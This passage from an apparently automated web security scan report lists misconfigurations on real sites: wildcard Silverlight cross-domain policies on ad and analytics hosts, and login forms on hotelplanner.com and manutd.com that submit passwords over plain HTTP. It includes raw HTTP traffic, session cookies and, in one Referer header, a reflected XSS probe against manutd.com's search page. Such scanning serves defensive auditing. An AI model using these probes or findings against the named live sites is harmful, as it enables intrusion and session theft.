Expires: Thu, 17 Nov 2011 14:28:14 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.10. http://ecn.t3.tiles.virtualearth.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "92f3dd6d163ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 458
Age: 1510791
Date: Mon, 03 Oct 2011 01:02:31 GMT
Last-Modified: Wed, 06 Jul 2011 19:53:51 GMT
Expires: Thu, 17 Nov 2011 13:22:40 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
...[SNIP]...

6.11. http://hits.guardian.co.uk/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.guardian.co.uk
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: hits.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:01 GMT
Server: Omniture DC/2.0.0
xserver: www4
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.12. http://pixel.quantserve.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Mon, 03 Oct 2011 23:48:53 GMT
Content-Type: text/xml
Content-Length: 312
Date: Sun, 02 Oct 2011 23:48:53 GMT
Server: QS

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
   <domain uri="*"/>
</allow-from>
<grant-to>
   <resour
...[SNIP]...

6.13. http://premiumtv.122.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://premiumtv.122.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: premiumtv.122.2o7.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:50:17 GMT
Server: Omniture DC/2.0.0
xserver: www376
Content-Length: 263
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

6.14. http://s0.2mdn.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 02 Oct 2011 21:13:15 GMT
Expires: Sun, 02 Oct 2011 21:10:22 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 9563
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6.15. http://secure-uk.imrworldwide.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-uk.imrworldwide.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-uk.imrworldwide.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 02 Oct 2011 23:51:44 GMT
Content-Type: text/xml
Content-Length: 255
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
Connection: close
Expires: Sun, 09 Oct 2011 23:51:44 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

6.16. http://speed.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Sun, 02 Oct 2011 23:49:49 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

7. Cleartext submission of password
There are 12 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Hotel/HotelRoomTypes.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Hotel/HotelRoomTypes.cfm?hotelID=113791&inDate=10/04/11&outDate=10/07/11&NumRooms=1&hrnQuoteKey=c6d7ef83-2fb9-429a-9916-19c05c46dbab HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.hotelplanner.com/Search/index.cfm?City=Boston%2C+MA&InDate=10%2F4%2F2011&OutDate=10%2F7%2F2011&NumRooms=1&ViewType=List&HotelName=&Rating=&PriceMin=1&PriceMax=9999&btnGo.x=113&btnGo.y=15
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=63063151; CFTOKEN=b435e7611cfab07e-C71CEF9A-1372-5005-24C466871C472C41; LOCALE=en%5FUS; CURRENCY=USD; SOURCECODE=IGoUGo; TLTSID=F123A950ED5310ED160FDD8181683406; TLTUID=F123A950ED5310ED160FDD8181683406; TRAFFICID=15786488; SCREENWIDTH=1920; SCREENHEIGHT=1200; LANGUAGE=1; __utma=69973641.2138588342.1317600610.1317600610.1317600610.1; __utmb=69973641.2.10.1317600610; __utmc=69973641; __utmz=69973641.1317600610.1.1.utmcsr=drf-global.com|utmccn=(referral)|utmcmd=referral|utmcct=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:29:43 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Vary: Accept-Encoding
Content-Length: 229491

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
   <html>
       <head>
       <title>Hotel Availability - Millennium Bostonian Hotel Boston</title>
       <meta http-equiv="Content-Type" content="t
...[SNIP]...
<table cellspacing="0" cellpadding="0" align="left" id="Navbar">
               <form action="/Login.cfm" method="post" name="frmLogin" target="_top">
               <tr>
...[SNIP]...
<input type="text" class="LoginInput" name="Email" >&nbsp;&nbsp;&nbsp;Password <input type="Password" class="LoginInput" style="width:110px;" name="Password">&nbsp;<a href="javascript:document.frmLogin.submit();">
...[SNIP]...

7.2. http://www.hotelplanner.com/Search/Index.cfm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hotelplanner.com
Path:   /Search/Index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /Search/Index.cfm?City=Boston&InDate=10/04/2011&OutDate=10/07/2011&NumRooms=1&adults=1&State=Massachusetts&Country=United%20States&sc=IGoUGo HTTP/1.1
Host: www.hotelplanner.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=hotelplanner&grp=9701&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.hotelplanner.com%2FSearch%2FIndex.cfm%3FCity%3D%24%7Bcity%7D%26InDate%3D%24%7BdepartureDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26OutDate%3D%24%7BreturnDate%3Ad%3A%22mm%2Fdd%2Fyyyy%22%7D%26NumRooms%3D%24%7Brooms%7D%26adults%3D%24%7Badults%7D%26State%3D%24%7Bstaten%7D%26Country%3D%24%7Bcountryn%7D%26sc%3DIGoUGo&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=149&pos=5&aii=41baf401-e791-4c75-8143-e95891286e0a&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 03 Oct 2011 00:10:06 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
P3P: CP='NOI DSP COR LAW NID CUR ADMa OUR DELa IND PHY ONL UNI PUR COM NAV STA'
Set-Cookie: LANGUAGE=1;path=/
Set-Cookie: SOURCECODE=IGoUGo;expires=Sat, 31-Mar-2012 00:10:06 GMT;path=/
Vary: Accept-Encoding
Content-Length: 225194


<style type="text/css">
<!--
#waitScreen
{
position: absolute;
left:0pt;
visibility: hidden;
height:100%;
width:100%
}
.Default
{
   FONT-WEIGHT: normal;
   FONT-SIZE: 11px;
   FONT-S
...[SNIP]...
<table cellspacing="0" cellpadding="0" align="left" id="Navbar">
               <form action="/Login.cfm" method="post" name="frmLogin" target="_top">
               <tr>
...[SNIP]...
<input type="text" class="LoginInput" name="Email" >&nbsp;&nbsp;&nbsp;Password <input type="Password" class="LoginInput" style="width:110px;" name="Password">&nbsp;<a href="javascript:document.frmLogin.submit();">
...[SNIP]...

7.3. http://www.manutd.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 26620
Cache-Control: public, max-age=153
Date: Sun, 02 Oct 2011 23:49:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en.aspx" class="hiddeninput" />
...[SNIP]...

7.4. http://www.manutd.com/One-United/Login.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/One-United/Login.aspx%3fredirectPath%3d%2fen%2fFanzone%2fCompetition-And-Polls%2fCompetition.aspx%3fid%3d%257BA04F2C18-1A4F-437D-B2BF-26E32C2683B7%257D%26regmode%3dfull" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/One-United/Login.aspx" class="hiddeninput" />
...[SNIP]...

7.5. http://www.manutd.com/One-United/Login.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /One-United/Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls/Competition.aspx?id={A04F2C18-1A4F-437D-B2BF-26E32C2683B7}&regmode=full HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.8.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); website#lang=en; ASP.NET_SessionId=dsijc245bi5upj3uvvwiumrc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web7
Content-Length: 21902
Expires: Mon, 03 Oct 2011 00:01:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 00:01:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div class="login regform LoginContainerStyles">
<form method="post" action="" id="members">
<br />
...[SNIP]...
</label>
<input name="phcontent_0$phoneunitedcontent_0$phcolumn1_1$password" type="password" id="phcontent_0_phoneunitedcontent_0_phcolumn1_1_password" tabindex="6" title="Password:" />
<div class="rule" style="margin-bottom: 15px;">
...[SNIP]...

7.6. http://www.manutd.com/Search-Results.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /Search-Results.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/en/One-United.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.4.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web4
Content-Length: 18228
Cache-Control: public, max-age=511
Date: Sun, 02 Oct 2011 23:55:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Search-Results.aspx%3fqs%3dmanutd_frontend%26catTxt%3d%26searchText%3dxss" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Search-Results.aspx" class="hiddeninput" />
...[SNIP]...

7.7. http://www.manutd.com/en.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Splash-Page.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.1.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 26620
Cache-Control: public, max-age=328
Date: Sun, 02 Oct 2011 23:49:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">

...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en.aspx" class="hiddeninput" />
...[SNIP]...

7.8. http://www.manutd.com/en/Club/Sponsors.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Club/Sponsors.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en/Club/Sponsors.aspx?sponsorid={F745DA14-CB5E-4A81-816A-8DB410E47A75} HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/COM_Sponsor_Footer_4.swf?targetTAG=_blank&clickTarget=_blank&pathTAG=http%3A//aka-cdn-ns.adtech.de/apps/69/Ad2515525St3Sz2384Sq101142722V0Id38/&closeTAG=javascript%3AcloseAdLayer2046906%28%29&openTAG=javascript%3AopenAdLayer2046906%28%29&expandTAG=javascript%3Aexpand2046906%28%29&collapseTAG=javascript%3Acollapse2046906%28%29&clicktarget=_blank&clickTarget=_blank&clickTARGET=_blank&CURRENTDOMAIN=www.manutd.com
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.6.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web6
Content-Length: 21722
Cache-Control: public, max-age=537
Date: Sun, 02 Oct 2011 23:59:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Club/Sponsors.aspx%3fsponsorid%3d%257BF745DA14-CB5E-4A81-816A-8DB410E47A75%257D" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Club/Sponsors.aspx" class="hiddeninput" />
...[SNIP]...

7.9. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.manutd.com
Path:   /en/Fanzone/Competition-And-Polls.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /en/Fanzone/Competition-And-Polls.aspx HTTP/1.1
Host: www.manutd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.manutd.com/Search-Results.aspx?qs=manutd_frontend&catTxt=&searchText=xss75931%3Cscript%3Ealert(document.location)%3C/script%3E14fb8fbf954
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: checkSplashPassage=1; CP=null*; __utma=1.1656468293.1317599341.1317599341.1317599341.1; __utmb=1.7.10.1317599341; __utmc=1; __utmz=1.1317599341.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Last-Modified: Sun, 02 Oct 2011 12:29:58 GMT
Server: Microsoft-IIS/7.5
LastModified: Sun, 02 Oct 2011 12:29:58 GMT
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
svr: web8
Content-Length: 19323
Cache-Control: public, max-age=1
Date: Mon, 03 Oct 2011 00:00:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head
...[SNIP]...
<div style="display:inline;" id="toolbarlogin"><form action="/One-United/Login.aspx?redirectPath=/en/Fanzone/Competition-And-Polls.aspx" method="post" style="width:505px;"><label for="loginEmail">
...[SNIP]...
</label><input type="password" id="loginPassword" name="loginPassword" /><input type="hidden" id="returnPath" name="returnPath" value="/en/Fanzone/Competition-And-Polls.aspx" class="hiddeninput" />
...[SNIP]...

7.10. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

Summary

Severity:   High
Confidence:   Certain
